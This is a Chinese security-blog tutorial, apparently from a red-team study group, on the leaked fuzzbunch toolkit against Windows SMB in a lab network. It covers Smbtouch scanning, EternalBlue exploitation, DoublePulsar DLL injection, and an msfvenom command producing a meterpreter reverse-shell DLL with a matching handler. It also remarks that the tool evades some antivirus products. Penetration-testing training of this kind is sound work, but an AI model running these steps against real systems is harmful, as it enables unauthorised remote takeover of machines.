文章来源|MS08067 内网安全知识星球
本文作者:BlackCat(Ms08067 内网小组成员)
前言
上阶段无意间接触到了这个工具,感觉功能还可以,在最近的hw中,测试发现,在一些08的机器,用这个打要比msf打成功的几率要高一些,而且国内有些杀软可过。
下载地址:https://github.com/peterpt/fuzzbunch.git
实验环境要求
实验目的:攻击机首先通过CS 获取93.16这台的权限,通过3389登陆到该系统,通过fuzzbunch工具,使目标机器:93.4上线 (真实环境可通过全局代理过去)
文件解压后是这样 :
总共包含三个目录:
1. windows目录针对Windows操作系统的利用工具和相关攻击代码;
2. swift目录中是包含入侵swift银行系统的操作记录等相关证据;//不用管
3. oddjob目录是后门Rootkit等相关文档。//不用管
攻击模块介绍
打开windows目录:
主要看这个工具:
fb.py
FB模块介绍
fuzzbunch功能类似于metasploit,功能较为自动化。
fuzzbunch下载地址https://github.com/fuzzbunch/fuzzbunch。
fb.py 即fuzzbunch 框架的入口文件,fb.py用于调用各个攻击模块,这些攻击模块有较多专注于Windows 的SMB服务(详见下文)。fuzzbunch 支持自动调用 或手动配置模块,模块的使用趋于自动化,模块之间也会自动调用,用于信息探测等,模块也可以通过xml 文件的修改自行定义参数,常见的配置文件方式以xx.xml以及xx.fb文件存在。
各个模块功能详细不去赘述,用到时会逐一讲解。
1.在跳板机上 先运行install.bat自动给你安装你所需要的组件,如pywin32,然后使用Python2.6运行fb.py
运行成功会展现以下界面
填写默认配置,目标IP地址、CallbackIP、日志地址、项目名称tcc等
目标地址:靶机 192.168.93.17
Call backIP:跳板机 192.168.93.4
按照图中操作:
插件被分解成几类:
目标识别和利用漏洞发现:Architouch,Rpctouch,Domaintouch,Smbtouch等;
漏洞利用:EternalBlue,Emeraldthread,Eclipsedwing,EternalRomance等;
目标攻击后后操作:Douplepulsar,Regread,Regwrite等。
一、Smbtouch模块探测可利用漏洞
然后我们通过使用Smbtouch使用smb协议来检测对方操作系统版本、架构、可利用的漏洞。
这是执行成功后的页面显示,圈出部分为可利用的永恒系列漏洞,这里使用最经典的永恒之蓝
二、使用ETERNALBLUE生成后门文件
选择”Eternalblue”,并执行。如下图,fb会自动载入预设配置
进行相应配置,包含网络连接超时配置、目标IP、目标端口、是否验证、是否验证后门、最大exploit次数、系统选择等。如下图:
非特殊情况 保持默认(注意选择对应的系统 X64、X86),回车即可
use Eternalblue
三、注入dll
使用DoublePulsar插件,DoublePulsar类似于一个注入器,有以下几个功能。
-
Ping:检测后门是否部署成功 -
RUNDLL:注入dll。 -
RunShellcode:注入shellcode -
Uninstall:用于卸载系统上的后门
这里主要是使用rundll模板注入dll。
这里先用MSF生成dll文件,放到跳板机的目录下
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.93.2 LPORT=8888 -f dll > 1.dll
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LhOST 192.168.93.2
msf6 exploit(multi/handler) > set lport 8888
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
扫描下方二维码加入星球学习
加入后邀请你进入内部微信群,内部微信群永久有效!
本文始发于微信公众号(Ms08067安全实验室):fuzzbunch工具实现dll注入
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论